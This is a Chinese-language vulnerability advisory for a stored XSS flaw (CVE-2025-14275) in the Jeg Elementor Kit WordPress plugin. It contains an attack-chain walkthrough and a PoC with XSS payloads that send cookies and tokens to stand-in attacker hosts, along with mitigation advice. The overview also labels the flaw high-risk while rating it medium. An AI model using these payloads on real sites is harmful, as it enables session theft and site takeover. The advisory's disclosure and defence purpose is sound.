CVE-2025-14275 Jeg Elementor Kit插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14275

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jeg Elementor Kit (WordPress插件)

漏洞概述

CVE-2025-14275是WordPress平台Jeg Elementor Kit插件中的一个高危安全漏洞。该漏洞是一种存储型跨站脚本攻击(Stored Cross-Site Scripting)，存在于插件的倒计时(countdown)小部件的重定向功能中。漏洞根源在于插件对用户输入的清理和验证不足，攻击者可以利用倒计时小部件注入恶意JavaScript代码。由于该代码会永久存储在数据库中，所有访问包含恶意倒计时元素的页面的用户都会受到攻击影响。攻击者只需要拥有WordPress网站的Contributor(贡献者)级别权限即可利用此漏洞，而无需管理员权限即可完成攻击链的部署。攻击者注入的恶意脚本会在管理员或其他用户访问相关页面时自动执行，可能导致会话劫持、凭据窃取、恶意重定向等严重后果。此漏洞影响Jeg Elementor Kit插件3.0.1及之前的所有版本，CVSS评分6.4，属于中等严重程度。由于该插件在WordPress生态中应用广泛，众多使用该插件构建网站的个人和企业都可能受到影响。建议网站管理员立即检查插件版本，并在厂商发布修复版本后第一时间进行升级。

技术细节

该漏洞的技术根源在于Jeg Elementor Kit插件的倒计时(countdown)小部件对redirect参数缺乏有效的输入验证和输出编码。攻击者通过WordPress的编辑器功能，在创建或编辑倒计时元素时，可以在redirect字段中注入包含恶意JavaScript代码的payload。由于插件未对用户输入进行适当的HTML实体编码或JavaScript转义，这些恶意代码会被直接写入到页面的DOM结构中。当其他用户访问包含该倒计时元素的页面时，浏览器会将其解析为可执行的JavaScript代码并执行。攻击者通常利用此漏洞窃取管理员的cookies或session token，从而接管整个WordPress后台。漏洞利用的关键在于倒计时小部件的JavaScript渲染逻辑直接使用了用户可控的输入，而没有经过sanitize_text_field或esc_html等WordPress安全函数的处理。攻击者可以使用诸如<img src=x onerror=alert(document.cookie)>或<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>等payload来实现恶意脚本的执行。由于存储型XSS的特性，这种攻击可以在管理员不知情的情况下持续存在，直到管理员发现并清理恶意内容。

攻击链分析

STEP 1

Reconnaissance

攻击者首先识别目标WordPress网站是否安装了Jeg Elementor Kit插件，并确认插件版本是否在3.0.1或更低版本范围内。攻击者可以通过查看页面源代码或使用Wappalyzer等工具进行探测。

STEP 2

Authentication

攻击者需要获得目标WordPress网站的账户访问权限，至少需要Contributor(贡献者)级别的权限。攻击者可以通过社会工程学、凭据填充或利用其他漏洞获取有效账户。

STEP 3

Payload Crafting

攻击者精心构造恶意XSS payload，通常使用img标签的onerror事件或script标签来注入JavaScript代码。常见payload包括：<img src=x onerror=alert(document.domain)>或<script>fetch('https://attacker.com/?c='+document.cookie)</script>。

STEP 4

Injection

攻击者登录WordPress后台，使用Elementor编辑器创建或编辑一个倒计时(countdown)小部件，将恶意payload注入到redirect URL字段中。由于插件未进行输入验证，payload被直接保存到数据库中。

STEP 5

Persistence

恶意代码作为页面内容的一部分永久存储在WordPress数据库中。任何访问该页面的用户都会触发恶意脚本的执行，形成持续性的攻击。

STEP 6

Exploitation

当管理员或高权限用户访问包含恶意倒计时元素的页面时，浏览器会执行注入的JavaScript代码。攻击者可以利用此机会窃取会话cookie、劫持管理员账户或执行其他恶意操作。

STEP 7

Account Takeover

攻击者获取管理员权限后，可以完全控制整个WordPress网站，安装后门、修改内容或进一步横向移动到服务器层面。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-14275 PoC - Stored XSS in Jeg Elementor Kit countdown widget
// Author: Contributor+ level authenticated user

// Step 1: Create or edit a countdown element via Elementor editor
// Step 2: Inject XSS payload in the redirect field

const xssPayload = `
<img src=x onerror="
  fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))
">
`;

// Alternative payload - session hijacking
const sessionHijackPayload = `
<script>
  document.addEventListener('DOMContentLoaded', function() {
    fetch('https://attacker.com/log?cookie=' + btoa(document.cookie));
  });
</script>
`;

// Payload for admin redirect to malicious site
const redirectPayload = `
javascript:fetch('https://evil.com/admin_panel?token='+localStorage.getItem('wp_token'))
`;

// Example: How the malicious data is stored in WordPress database
// POST request to wp-admin/admin-ajax.php
const exploitRequest = {
  action: 'elementor_ajax',
  commands: ['save_builder'],
  data: {
    container: {
      elements: [{
        id: 'unique-element-id',
        widgetType: 'jkit_countdown',
        settings: {
          jkit_countdown_redirect_url: xssPayload,
          // Other countdown settings...
        }
      }]
    }
  }
};

console.log('[+] CVE-2025-14275 PoC generated');
console.log('[+] Payload:', xssPayload);
console.log('[+] When admin visits the page, cookie will be exfiltrated');

影响范围

Jeg Elementor Kit <= 3.0.1

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，立即审查所有具有Contributor及以上权限的用户账户，移除可疑账户；其次，使用WordPress安全插件(如Wordfence)启用实时防火墙规则，阻止XSS攻击；再次，在网站配置中添加Content-Security-Policy头部，限制内联脚本执行；最后，考虑暂时禁用Jeg Elementor Kit插件的倒计时小部件功能，直到安全更新可用。同时建议启用WordPress的自动更新功能，以便在安全版本发布时能够及时应用。